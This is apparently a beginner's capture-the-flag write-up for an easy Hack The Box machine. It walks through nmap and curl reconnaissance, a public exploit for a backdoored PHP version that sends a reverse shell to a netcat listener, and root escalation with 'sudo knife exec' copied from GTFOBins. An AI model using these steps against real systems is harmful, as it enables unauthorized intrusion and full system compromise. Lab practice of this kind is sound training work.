It’s one of the easiest machines on Hack The Box which is good for beginners. Therefore I will try to explain my every step thoroughly.

We will start from port scanning with nmap:

nmap -A -Pn

(We use -A flag for OS detection, version detection, script scanning, traceroute and -Pn for not pinging the host.)

Only two ports seem to be open. Let’s check the web site which is running on 80 port!

But i wasn’t able to find something interesting here, nothing in page source and no interesting links as well. Also directory enumeration with gobuster had no result πŸ™ So you can skip this step.

Now time to check the site with curl:

curl -I

(we use -I option to print the title without the body)

And what we see! Very strange version of php here…Let’s google that.

We can find out that it is a version of php with a backdoor and use an exploit. I took the following one from github:

So we need to grab a code from this link and put it to the file that we create (I called it


(I prefer nano, but you can use vi or vim, etc.)

Then set our listener on 443 port (or you can use different one):

nc -lnvp 443

And run our script. Usage: python3 <target-ip> <attacker-ip> <attacker-port>

python3 443

And… we got a shell πŸ™‚

Flag is waiting for us in user’s home directory:

cat /home/james/user.txt

Next we need to find a way how to get root. Try to check which programs our user james can run with root privileges:

sudo -l

And he can run knife! Now moving to the GTFOBins and checking for Knife. And it’s exists here:

Let’s copy the command and run it:

sudo knife exec -E ‘exec “/bin/sh”‘

Very nice, we have root πŸ˜‰

Flag in root directory:

cat /root/root.txt

Thanks for your attention. If you still have any questions write a comment below.

Leave a comment

Your email address will not be published. Required fields are marked *